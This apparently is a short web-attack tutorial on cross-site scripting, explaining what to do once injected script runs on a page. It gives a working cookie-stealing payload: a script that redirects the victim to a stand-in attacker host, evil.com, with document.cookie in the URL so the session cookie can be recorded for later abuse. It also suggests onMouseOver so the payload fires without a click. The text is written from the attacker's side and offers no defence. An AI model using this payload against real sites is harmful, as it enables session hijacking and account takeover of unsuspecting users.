I can run script, what now?
RedirectionYou've seen how you can enter script into a page and have it run when a user clicks on a link, or views a page.
This is really just a proof of concept, you don't want to have people viewing the popup boxes all day!
So .. you want to do something more useful?
Other TipsOne common technique is to redirect the user to a different website which you control. This would allow you to record the users cookie for later (ab)use.
The way I've done this in the past is to use code like this:
<script>
document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie;
</script>This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'.
The CGI script gets given the cookie of the innocent user as a parameter called 'cookie'. This could be recorded for use later.
Using the onClick handler you have to rely upon the user clicking on a link you have placed.
You do run the risk that the user will not click it, so what then?
You can use another method onMouseOver, this allows you to have code executed when the mouse pointer merely moves over a link.
An other article:http://ha.ckers.org/xss.htmlhttp://www.informit.com/articles/article.asp?p=603037&rl=1